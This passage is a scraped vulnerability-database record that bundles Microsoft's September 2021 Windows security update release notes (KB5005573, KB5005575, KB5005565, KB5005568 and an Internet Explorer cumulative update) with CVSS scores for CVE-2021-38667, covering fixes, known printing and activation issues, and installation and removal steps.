{"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005573 (OS Build 14393.4651)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005573", "href": "https://support.microsoft.com/en-us/help/5005573", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:08", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes Windows to generate many AppLocker or SmartLocker success events in the AppLocker EXE and DLL event channel. \n * Addresses an issue that prevents the ShellHWDetection service from starting on a Privileged Access Workstation (PAW) device and prevents you from managing BitLocker drive encryption.\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>). \n\n### Windows 10 servicing stack update - 20348.220\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005575 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in KB5005619. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005575 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006745. \nYou might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006745. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015879 for all releases starting September 14, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005575>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Microsoft Server operating system-21H2**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File Information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005575](<https://download.microsoft.com/download/4/d/c/4dc44ff9-41a1-4312-a033-b55efa9879ab/5005575.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.220](<https://download.microsoft.com/download/2/3/2/2326ef05-5b2e-4027-89cc-c33f991578bb/SSU_version_20348_220.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005575 (OS Build 20348.230)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005575", "href": "https://support.microsoft.com/en-us/help/5005575", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:02", "description": "None\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard. \n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1164) released September 14, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 19041.1220, 19042.1220, and 19043.1220\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005565 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note **The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005611. \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005565 are unaffected and print operations to that printer will succeed as usual.**Note **IPP is not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006738. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006670. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005565>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005565](<https://download.microsoft.com/download/f/b/e/fbe0a64d-2558-48c0-b206-ad7185db9226/5005565.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1220, 19042.1220, and 19043.1220](<https://download.microsoft.com/download/5/8/e/58e627eb-d91a-470b-a67b-8cdfddd9c71c/SSU_version_19041_1220.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005565 (OS Builds 19041.1237, 19042.1237, and 19043.1237)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005565", "href": "https://support.microsoft.com/en-us/help/5005565", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:04", "description": "None\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue that causes PowerShell to create an infinite number of child directories. This issue occurs when you use the PowerShell **Move-Item** command to move a directory to one of its children. As a result, the volume fills up and the system stops responding.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 17763.2170\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of KB5005568 are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5005625 \nAfter installing this or a later update, installation of printers using Internet Printing Protocol (IPP) might not complete successfully. Devices which had connected to and installed the printer prior to the installation of KB5005568 are unaffected and print operations to that printer will succeed as usual.**Note** IPP is not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006744. \nAfter installing KB5005102, Windows Server 2019 virtual machines (VMs) employing Software Defined Networks (SDN) or traditional multi-tenant RRAS gateways may lose connectivity with external networks using Gateway connections. Installing the August preview or later update will not affect Windows Server 2019 hosts, Network Controller VMs, and Software Load Balancer VMs.| This issue is resolved in KB5006672. \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of KB5005625 are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. Printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006672. \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones.**Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in KB5006672. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:You **must **install the August 10, 2021 SSU (KB5005112) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005568>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005568](<https://download.microsoft.com/download/c/8/b/c8b9a4f6-1a3f-48da-8941-518598038d33/5005568.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 17763.2170](<https://download.microsoft.com/download/0/0/5/005a59ce-1fe1-4dc4-8460-4a56b7c21e38/SSU_version_17763_2170.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005568 (OS Build 17763.2183)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005568", "href": "https://support.microsoft.com/en-us/help/5005568", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:02", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-us/security-guidance>).Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The September 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following: \n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the September 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from September 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the September 2021 Security Only Quality Update, and the September 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended 